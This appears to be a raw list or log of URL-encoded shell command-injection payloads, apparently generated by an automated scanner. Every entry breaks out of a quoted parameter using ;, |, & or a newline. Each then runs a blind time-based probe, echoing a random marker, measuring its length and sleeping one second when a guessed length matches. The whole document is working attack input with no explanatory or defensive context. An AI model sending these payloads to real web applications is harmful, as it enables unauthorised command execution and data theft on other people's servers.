+%27%7C%20%5B%205%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%206%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%207%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%208%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%7C%20%5B%209%20-ne%20%24%28echo%20QPTCDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UXESAW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%0A%20str%3D%24%28echo%20PAACLD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20FBVDTE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522 +%27%7C%20%5B%201%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%202%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%203%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%204%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%205%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%206%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%207%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%208%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%7C%20%5B%209%20-ne%20%24%28echo%20ZATMDT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ERQGRV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%0A%20str%3D%24%28echo%20WYYYZM%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522 +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20QZBRFT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C +%27%7C%20%5B%201%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%202%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%203%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%204%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%205%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%206%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%207%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%208%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%7C%20%5B%209%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F +%27%7C%20%5B%201%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%202%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%203%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%204%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%205%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%206%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%207%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%208%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%7C%20%5B%209%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F +%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F 